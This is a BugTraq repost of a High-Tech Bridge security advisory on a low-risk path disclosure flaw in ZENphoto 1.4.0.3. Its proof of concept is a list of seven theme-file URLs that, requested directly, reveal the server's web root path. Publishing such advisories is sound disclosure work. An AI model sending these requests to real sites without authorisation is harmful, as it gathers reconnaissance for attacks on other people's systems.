BugTraq
HTB22944: Path disclousure in ZENphoto Apr 21 2011 11:42AM
advisory htbridge ch
Vulnerability ID: HTB22944
Reference: http://www.htbridge.ch/advisory/path_disclousure_in_zenphoto.html
Product: ZENphoto
Vendor: Zenphoto ( http://www.zenphoto.org/ )
Vulnerable Version: 1.4.0.3
Vendor Notification: 07 April 2011
Vulnerability Type: Path disclosure
Risk level: Low
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )

Vulnerability Details:
A remote user can determine the full path to the web root directory and other potentially sensitive information.
The following PoC is available:

http://[host]/themes/default/slideshow.php
http://[host]/themes/default/password_form.php
http://[host]/themes/effervescence_plus/404.php
http://[host]/themes/effervescence_plus/archive.php
http://[host]/themes/effervescence_plus/gallery.php
http://[host]/themes/effervescence_plus/index.php
http://[host]/themes/effervescence_plus/image.php

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus